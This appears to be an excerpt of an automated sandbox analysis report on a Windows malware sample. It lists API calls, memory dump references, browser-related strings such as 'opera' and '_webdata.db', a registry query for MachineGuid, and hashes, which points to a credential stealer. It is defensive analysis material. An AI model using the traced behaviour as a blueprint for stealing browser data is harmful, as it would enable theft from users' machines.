                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 1304948518-4000257214
                                                                                                                                                                        • Opcode ID: 02c5fad55053558de216ba8b1f27d8b5614e3aa14d077fb9bd1e019b92c36125
                                                                                                                                                                        • Instruction ID: 68e42761a071b971988e713d7a9329dab67c9a2d3ba34c18d10423fa7915a5d5
                                                                                                                                                                        • Opcode Fuzzy Hash: 02c5fad55053558de216ba8b1f27d8b5614e3aa14d077fb9bd1e019b92c36125
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F313D76B000509FCB45DF9CDCA1EDD77B5AF89704B0840B9E509E3361EA70AA598B8A
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0041F52D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                        • String ID: _webdata.db
                                                                                                                                                                        • API String ID: 4033686569-3003761311
                                                                                                                                                                        • Opcode ID: 03fcb68b62edd4cc0901e0f3f2b8d30333fbd9d85706720921ba04f5b00529a0
                                                                                                                                                                        • Instruction ID: febba02e00eb5ad1abc6f1f573f127c299e56ac6d3cf98a7cc9ac6699806af15
                                                                                                                                                                        • Opcode Fuzzy Hash: 03fcb68b62edd4cc0901e0f3f2b8d30333fbd9d85706720921ba04f5b00529a0
                                                                                                                                                                        • Instruction Fuzzy Hash: B2415E76A002149FCB05DF9CDC90ADD77F0FF48200B084079E815E3360E774AA54CB9A
                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,opera), ref: 00427624
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: opera
                                                                                                                                                                        • API String ID: 0-3755996268
                                                                                                                                                                        • Opcode ID: b7fe60d4d8f5da63bc881c80491bedc57024296b70a16a8426c2c8ba6effc35b
                                                                                                                                                                        • Instruction ID: 28ce37bdba63fdf670f2eb3483226be30b20697ebd68f19dc6878048ad365f53
                                                                                                                                                                        • Opcode Fuzzy Hash: b7fe60d4d8f5da63bc881c80491bedc57024296b70a16a8426c2c8ba6effc35b
                                                                                                                                                                        • Instruction Fuzzy Hash: E4412C79A005099FCB04DF68CC84EA6B3B5FF84314B048669E865C73A5EB70FD55CB85
                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,opera), ref: 00427BBC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID:
• String ID: opera
• API String ID: 0-3755996268
• Opcode ID: 9da8590b77eade4db0e2217ae06534993612669f1f8ec0b058a2f14459546fb2
• Instruction ID: fbf94a1aac6f0649c4d01888ffc6c9a1ee9089d9d0ad002a494abf0b5efeb30b
• Opcode Fuzzy Hash: 9da8590b77eade4db0e2217ae06534993612669f1f8ec0b058a2f14459546fb2
• Instruction Fuzzy Hash: 48415E39B005099FC704DF68CC84EAAB7B5FF48224B04825AEC2487365EB70F959CB95
APIs
• FindNextFileA.KERNELBASE(?,?), ref: 0043D159
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: FileFindNext
• String ID: %s\%s
• API String ID: 2029273394-4073750446
• Opcode ID: ade8a3065079f7fe2d63767ac0aee6f01b968f0c9dc8346f63dba5972e83ab9a
• Instruction ID: e5dcfcbca1b397e97a14285671db9a32f8ddeef68fab5e5639752cc47cd7be3d
• Opcode Fuzzy Hash: ade8a3065079f7fe2d63767ac0aee6f01b968f0c9dc8346f63dba5972e83ab9a
• Instruction Fuzzy Hash: D521A5B15182459BC314CB64DD90AAAB3E8EFD4704F04871CE85983211FBB6BA99CB96
APIs
• GetVolumeInformationA.KERNEL32 ref: 00430E41
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: InformationVolume
• String ID: C
• API String ID: 2039140958-1037565863
• Opcode ID: 89265af47b8e42f5e2c63c97d8abce5dbfdc09ea21575686cc3411b91f916200
• Instruction ID: 939abc69a031ece2d24172328d78f5e51984fd98eee70f60e92d9ab8a2c1987a
• Opcode Fuzzy Hash: 89265af47b8e42f5e2c63c97d8abce5dbfdc09ea21575686cc3411b91f916200
• Instruction Fuzzy Hash: 7D1157316087409FD340DF28CC94A5DBBE0EF9A308F09C55DE598A7322E371DA86CB96
APIs
• HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: HttpOpenRequest
• String ID: GET
• API String ID: 1984915467-1805413626
• Opcode ID: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
• Instruction ID: 8e83dcfa2c2d97efb602a18a9ba3dc01c5ea0efa355a390095ddbcd516262747
• Opcode Fuzzy Hash: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
• Instruction Fuzzy Hash: D6012CB5F15229DFE710DFA8CC80E7B77F9EB48700B154024E910E7321E6B49C018B65
APIs
• HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpOpenRequest
                                                                                                                                                                        • String ID: GET
                                                                                                                                                                        • API String ID: 1984915467-1805413626
                                                                                                                                                                        • Opcode ID: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
                                                                                                                                                                        • Instruction ID: 746a938a8d7015067999d655a9801a7b5ec994f78fa219be27d916c50eeeb009
                                                                                                                                                                        • Opcode Fuzzy Hash: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
                                                                                                                                                                        • Instruction Fuzzy Hash: 2401EC75F11129DFE710DFA8DC80E7B77F9EB48710B058124E910E7325E7B598118B65
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,?,?,?,?), ref: 0043258B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID: MachineGuid
                                                                                                                                                                        • API String ID: 3660427363-4186287252
                                                                                                                                                                        • Opcode ID: c94459e4085fe888039338f2c7fdbaf626c6212497e0a00956e94f0ed3ebcbd5
                                                                                                                                                                        • Instruction ID: 5ba472d5fa0efd0d9b5ca7829f604563e49436e1e198017096eada5890ab671b
                                                                                                                                                                        • Opcode Fuzzy Hash: c94459e4085fe888039338f2c7fdbaf626c6212497e0a00956e94f0ed3ebcbd5
                                                                                                                                                                        • Instruction Fuzzy Hash: 52F0EC76604214ABD700DB58EC84D9BB3ECEB88614F44483AFA99C3311E674E955CB66
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,0066C334,00000000,00020019,?), ref: 00431E73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID: ?
                                                                                                                                                                        • API String ID: 71445658-1684325040
                                                                                                                                                                        • Opcode ID: 754043c0255be4800ef8b4efe25c51af904ae3d8f01cb9ee33039990bf50625b
                                                                                                                                                                        • Instruction ID: b386336a90e49fb010f20b4bf0df57d910b683dc075ac6c0aeeb129a0fe4804c
                                                                                                                                                                        • Opcode Fuzzy Hash: 754043c0255be4800ef8b4efe25c51af904ae3d8f01cb9ee33039990bf50625b
                                                                                                                                                                        • Instruction Fuzzy Hash: 85018C76309340AFD314EF25DC94D6ABBEABFCA304F12815DE8448B274DAB05840DF16
                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00431C8C
                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00431CB8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocGlobalHeapMemoryStatus
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3630205914-0
                                                                                                                                                                        • Opcode ID: a14f4d3335bee6de17cec28eebcdb48c0d3f9895553d3df1c2003d7369c51479
                                                                                                                                                                        • Instruction ID: 6e0525b4c5a95ce5f74839c56e00994e3795a20e22c33a4271fb97e58d292a7a
                                                                                                                                                                        • Opcode Fuzzy Hash: a14f4d3335bee6de17cec28eebcdb48c0d3f9895553d3df1c2003d7369c51479
                                                                                                                                                                        • Instruction Fuzzy Hash: E7F031B15462609FC710EB26CCA8D073BF8EB89710F0051B8F949CB260E7B49800CFA6
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00416C6B
                                                                                                                                                                        • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 00416C85
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
Similarity
• API ID: HttpRequestSendlstrlen
• String ID:
• API String ID: 2340568100-0
APIs
• HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00431323
• RegOpenKeyExA.KERNEL32(80000002,0066C297,00000000,00020119), ref: 00431346
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AllocHeapOpen
• String ID:
• API String ID: 1634843882-0
APIs
• memset.MSVCRT ref: 0043A486
• RegOpenKeyExA.KERNEL32(80000001,0066C80C,00000000,00020119,?), ref: 0043A4AE
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Openmemset
• String ID:
• API String ID: 180050240-0
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004348C0
• Process32First.KERNEL32(00000000,?), ref: 004348CF
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateFirstProcess32SnapshotToolhelp32
• String ID:
• API String ID: 2353314856-0
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004349E0
• Process32First.KERNEL32(00000000), ref: 004349EF
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CreateFirstProcess32SnapshotToolhelp32
• String ID:
• API String ID: 2353314856-0
• Opcode ID: 734e7393436822b14d7a173c9a00091c6288ef1f53c69016cc522e7643221ecd
• Instruction ID: 12dcd21c715183130a2b389f3e35df8a9c847fcf6acd87ec3e21385f8693035a
• Opcode Fuzzy Hash: 734e7393436822b14d7a173c9a00091c6288ef1f53c69016cc522e7643221ecd
• Instruction Fuzzy Hash: 7AF030713012189FD7709B19DD4DF9677E8EB4A700F044028B948DB3D0E6649816CB95
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004346E0
• Process32First.KERNEL32(00000000), ref: 004346EF
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CreateFirstProcess32SnapshotToolhelp32
• String ID:
• API String ID: 2353314856-0
• Opcode ID: 449c124edec59f0f8e1885be54e72448e93be717fbd730a408a16dc21b69502b
• Instruction ID: e51a445a08013656bc54a330da56f2ec570e2be12ad10c0311373ecd3626a404
• Opcode Fuzzy Hash: 449c124edec59f0f8e1885be54e72448e93be717fbd730a408a16dc21b69502b
• Instruction Fuzzy Hash: D1F06D34340605AFD760AF59EC8DF563BECAB89740F1144A8F914DB3D2D670EC008BA6
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: DriveTypememset
• String ID:
• API String ID: 1397174798-0
• Opcode ID: 46d6d8651bbad5f298d60486129b832e82091905dcf8b5bec56b496162f35204
• Instruction ID: e724836340b2b7aa2e8ab5b23c3cd8b41ba37501ceb8b35c2324d54636bd635f
• Opcode Fuzzy Hash: 46d6d8651bbad5f298d60486129b832e82091905dcf8b5bec56b496162f35204
• Instruction Fuzzy Hash: 6AE086B5E401159BC711DB50DD41F5DB365ABD8309F184166F51493385FBB0AA0187AD
APIs
• LoadLibraryA.KERNEL32(?,?,?), ref: 00441370
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
• Instruction ID: 4376c3151c101c1f2856b8dd4cb0e85140bd373f91dae02cc3ec93c000e5ac0a
• Opcode Fuzzy Hash: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
• Instruction Fuzzy Hash: 09C17779606600DFCB04DF6ADC58910B7A6EB883053D5A06DD80A8777EEBF15C93CB0A
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00420B6A
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00424DDC
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
APIs
• FindNextFileA.KERNEL32(?,?), ref: 004229C3
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: FileFindNext
• String ID:
• API String ID: 2029273394-0
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CloseWindow
• String ID:
• API String ID: 2868366576-0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 20e9619712d8c3800fa872adc4cf283d3e7cbdaa988b29b034e15f1b44c331e6
                                                                                                                                                                        • Instruction ID: a265500817d880a48ddfc289da5cf24c2773e9e0b2a3fe6c7fd080c8e4643ead
                                                                                                                                                                        • Opcode Fuzzy Hash: 20e9619712d8c3800fa872adc4cf283d3e7cbdaa988b29b034e15f1b44c331e6
                                                                                                                                                                        • Instruction Fuzzy Hash: 80319177A002199FCB00DF68EC909D977B4FF893187084255D816E72A1EB70EB59CB85
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00414EAE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CrackInternet
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1381609488-0
                                                                                                                                                                        • Opcode ID: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
                                                                                                                                                                        • Instruction ID: ad51b445d1971d488cb6eb1a7ddcfcdc88647cb932c96ebc81f61fd4cf75d457
                                                                                                                                                                        • Opcode Fuzzy Hash: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
                                                                                                                                                                        • Instruction Fuzzy Hash: 00212B756002049FDB40CF6ADC84E5A77E4FF48214B058175F808C7322D7B4EE568BAA
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,0066C376,00000000,?,?), ref: 004320E9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
